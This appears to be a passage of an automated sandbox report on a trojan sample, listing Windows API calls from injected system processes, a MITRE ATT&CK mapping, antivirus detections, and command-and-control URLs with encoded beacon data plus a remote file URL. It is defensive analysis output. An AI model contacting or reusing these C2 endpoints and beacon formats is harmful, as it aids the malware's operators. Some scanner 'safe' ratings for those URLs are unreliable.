Source: C:\Windows\SysWOW64\resmon.exe	Code function: GetLocaleInfoW,	8_2_1003B3BA
Source: C:\Windows\SysWOW64\resmon.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,	8_2_1004A78D
Source: C:\Windows\SysWOW64\resmon.exe	Code function: GetLocaleInfoW,	8_2_1004A94F
Source: C:\Windows\SysWOW64\resmon.exe	Code function: EnumSystemLocalesW,	8_2_1004A9FD
Source: C:\Windows\SysWOW64\resmon.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	8_2_1004AA3D
Source: C:\Windows\SysWOW64\resmon.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	8_2_1004AABA
Source: C:\Windows\SysWOW64\resmon.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,	8_2_1004AB3D
Source: C:\Windows\SysWOW64\resmon.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	8_2_10037B53
Source: C:\Windows\SysWOW64\resmon.exe	Code function: GetLocaleInfoW,	8_2_1004AD30
Source: C:\Windows\SysWOW64\resmon.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	8_2_10047D86
Source: C:\Windows\SysWOW64\resmon.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_1004AE58
Source: C:\Windows\SysWOW64\resmon.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	8_2_1004AF05
Source: C:\Windows\SysWOW64\resmon.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	8_2_1003CF4D
Source: C:\Windows\SysWOW64\resmon.exe	Code function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	8_2_1004AF6D
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: EnumSystemLocalesW,	9_2_1003B37D
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: GetLocaleInfoW,	9_2_1003B3BA
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,	9_2_1004A78D
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: GetLocaleInfoW,	9_2_1004A94F
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: EnumSystemLocalesW,	9_2_1004A9FD
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	9_2_1004AA3D
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	9_2_1004AABA
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,	9_2_1004AB3D
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	9_2_10037B53
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: GetLocaleInfoW,	9_2_1004AD30
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	9_2_10047D86
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_1004AE58
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	9_2_1004AF05
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	9_2_1003CF4D
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: _TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	9_2_1004AF6D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: EnumSystemLocalesW,	10_2_1003B37D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: GetLocaleInfoW,	10_2_1003B3BA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,GetLocaleInfoW,	10_2_1004A78D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: GetLocaleInfoW,	10_2_1004A94F
Source: C:\Windows\SysWOW64\raserver.exe	Code function: EnumSystemLocalesW,	10_2_1004A9FD
Source: C:\Windows\SysWOW64\raserver.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	10_2_1004AA3D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	10_2_1004AABA
Source: C:\Windows\SysWOW64\raserver.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,	10_2_1004AB3D
Source: C:\Windows\SysWOW64\raserver.exe	Code function: GetLocaleInfoW,	10_2_1004AD30
Source: C:\Windows\SysWOW64\raserver.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	10_2_10047D86
Source: C:\Windows\SysWOW64\raserver.exe	Code function: GetModuleFileNameW,___crtMessageBoxW,GetStdHandle,_strlen,WriteFile,__invoke_watson,___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	10_2_1003CD92
Source: C:\Windows\SysWOW64\raserver.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_1004AE58
Source: C:\Windows\SysWOW64\raserver.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	10_2_1004AF05
Source: C:\Windows\SysWOW64\raserver.exe	Code function: _memset,_TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	10_2_1004AF6D

Source: C:\Windows\System32\svchost.exe

Code function: 1_2_0000000180007D50 GetSystemTimeAsFileTime,

1_2_0000000180007D50

Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,	3_2_1001D6D7
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,	3_2_1001DFCB
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,	3_2_10026330
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,	3_2_10022490
Source: C:\Windows\SysWOW64\control.exe	Code function: 3_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,	3_2_1001D91A
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,	6_2_1001D6D7
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,	6_2_1001DFCB
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,	6_2_10026330
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,	6_2_10022490
Source: C:\Windows\SysWOW64\fontview.exe	Code function: 6_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,	6_2_1001D91A
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,	8_2_1001D6D7
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,	8_2_1001DFCB
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,	8_2_10026330
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,	8_2_10022490
Source: C:\Windows\SysWOW64\resmon.exe	Code function: 8_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,	8_2_1001D91A
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,	9_2_1001D6D7
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,	9_2_1001DFCB
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,	9_2_10026330
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,	9_2_10022490
Source: C:\Windows\SysWOW64\BackgroundTransferHost.exe	Code function: 9_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,recvfrom,WSAGetLastError,inet_ntoa,sendto,	9_2_1001D91A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10026330 bind,InterlockedIncrement,InterlockedIncrement,	10_2_10026330
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_10022490 socket,ioctlsocket,bind,SetLastError,listen,WSAGetLastError,GetLastError,SetLastError,WSAGetLastError,SetLastError,WSAGetLastError,SetLastError,	10_2_10022490
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1001D6D7 socket,WSAGetLastError,htons,htons,htonl,htons,setsockopt,setsockopt,setsockopt,setsockopt,bind,_memset,_memset,recvfrom,WSAGetLastError,inet_ntoa,sendto,	10_2_1001D6D7
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1001D91A socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,setsockopt,bind,_memset,_memset,recvfrom,WSAGetLastError,inet_ntoa,sendto,	10_2_1001D91A
Source: C:\Windows\SysWOW64\raserver.exe	Code function: 10_2_1001DFCB socket,WSAGetLastError,htons,htonl,setsockopt,setsockopt,bind,WSAGetLastError,setsockopt,setsockopt,	10_2_1001DFCB

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	14 Native API	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	11 Access Token Manipulation	11 Virtualization/Sandbox Evasion	LSASS Memory	231 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	2 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1022 Process Injection	11 Access Token Manipulation	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1022 Process Injection	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	2 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	2 File and Directory Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	22 System Information Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
1731043030539.exe	61%	Virustotal		Browse
1731043030539.exe	66%	ReversingLabs	Win64.Trojan.ReflectiveLoader
1731043030539.exe	100%	Avira	TR/Crypt.EPACK.Gen2
1731043030539.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=17358	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=17358	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUfi9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL48d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXaYTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfmBM8ui63qGw1hOYc0Maww2aCZlGFx2cWqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4=	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=17358	0%	Avira URL Cloud	safe
http://47.76.199.218	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjBW1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZsdrjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PXFHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8=	0%	Avira URL Cloud	safe
http://47.76.199.218om	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=17358	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=	0%	Avira URL Cloud	safe
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSYQJSmUa4R0nKTUopxtu5aRZUmxtVTsHV29kf7cYL-MjTckRfIpjTbB7xzYWtqFO5vPdazU9kHSC8d0RJwPJPGxrPzKc6*Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfbfRmwgZ5cGzSvaFX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoVOv87GDYU96jq0srfmNJL5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pNJsxbItKeA*DsMEI=	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.5566331.com	47.76.199.218	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=x3N9tEE0lQUfi9u1AJBLZ3udzrGo7J9wzUQnwqEojuqL48d5TpYqNaLoElKA2eLt5tJwUso0CT4hx7brOujTPxt86i1LQoCN1bWPfh0c6TblwURKXaYTrdRDdpFzPPjdf6A5hqF6agS5bMFml2tycvxuF8UFeAKptoU6nA1cgx5I7zk50dryFihgpyA0PukB3pWbqvv1m9czQ98TexEeBUkYnPWhl9iP5lmz2GhU0unSn1dv0GeLH-OgLe5CX54v7Yi7WikjFNlbGcralrQa62waJH3pu9aTS352sJXA9uT9hy8ZcQrnfmBM8ui63qGw1hOYc0Maww2aCZlGFx2cWqEiD7rdNNLo2gqW-R05XE8J-33FyFPn7LMN6KEOJbTRxuzcnsrcYfCcxUhimBcpclNQDyBgNCuTCZtw4=	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=1735806563	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=1735806618	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=1735806535	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8449&time=1735806505	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=1735806590	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=H-KG2vKhpxJqL5lmR9ZFRYLzK6PDv8wdWWKBL0E8b4xToLTJIEyFobzTUGIDhQFSYQJSmUa4R0nKTUopxtu5aRZUmxtVTsHV29kf7cYL-MjTckRfIpjTbB7xzYWtqFO5vPdazU9kHSC8d0RJwPJPGxrPzKc6*Gf3IQhISENPCyElwA1seCe9t9MDzrO6s8tzVUaN6AoyzXj5JLHcYaDpiRstfbfRmwgZ5cGzSvaFX2F3SWBZS-UXSUc1LXKbxj7BIlROOnBGq9W87Jahc5lRXYLahNkQgcSGnQfg8EVRIBmeFWLWQ93fKDkUgOIgCDf1MEG-z5XjVC1Xd1VbizNoVOv87GDYU96jq0srfmNJL5dU15FioMWjOk4nVpWQoyVcldVjZBj81YjBU2pNJsxbItKeA*DsMEI=	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=enjBW1on706Z889iAwcmYokmbY7OUWSub4RGZFTo5srT4NgG910VgRecjciZvPR4XAyh90HOJbDJon8RaVjQHO81y-ajNKJHNejxKSFcxTV5Qnm0UOlEx6R9lcXLM57LmDSuDAn68tRa6BlvHilxXgmsbfRSvIKzNgU5v5ER-LIEUdjL73kn6UlMaN5SNBb82Uf09yBZnUSM2kXxcq7epbC59GPPHEmQjhIRA53rEfI-shE828m9HdjVXZsdrjKwiPSCKC-sPbbAcrEGpoQBg3ewMUYJY3eBz87XfKJw6YmDN5opmWduY3zlMkMrGMYk4ci7KQ9NDP6R4PXFHXTAfInb1wSixuJkduD3ju49zc7Ntu7TzwxhkOcADsXgL7QMUs77nRoBQ2Wutko3OIjLqRtl8865gOuppXixmM8=	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high
https://powerpoint.office.comcember	explorer.exe, 00000002.00000002.3305053857.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2051006700.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false		high
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8818&time=17358	raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806607&data=	resmon.exe, 00000008.00000002.3293228985.0000000002888000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr	1731043030539.exe	false		high
https://excel.office.com	explorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096115014.0000000009B95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000002.00000000.2044223303.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3298493696.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.3299027484.0000000008870000.00000002.00000001.00040000.00000000.sdmp	false		high
https://gitee.com/didiaodewangzhe/jsonAPP/raw/master/raidjsonapi.cpp	control.exe, fontview.exe, resmon.exe, BackgroundTransferHost.exe, raserver.exe	false		high
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07	1731043030539.exe	false		high
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806551&data=	control.exe, 00000003.00000002.3293163076.0000000002E84000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000002.3300221466.0000000009BE4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.0000000009B91000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096750303.0000000009BE3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096115014.0000000009B95000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	false		high
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8638&time=17358	resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806579&data=	fontview.exe, 00000006.00000002.3293216939.0000000000BB6000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.76.199.218	raserver.exe, 0000000A.00000002.3293273554.0000000002ED8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8727&time=17358	BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A99000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000003.3183775857.0000000002A99000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://47.76.199.218/index.php/inface/Heart/getConfigDyn?m_id=555prc4xnupd&member_id=8547&time=17358	fontview.exe, 00000006.00000002.3293216939.0000000000B98000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pki-ocsp.symauth.com0	1731043030539.exe	false		high
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2039818389.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3297386884.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000000.2051006700.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3305053857.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.msn.com/	explorer.exe, 00000002.00000003.3094503764.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2044913659.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false		high
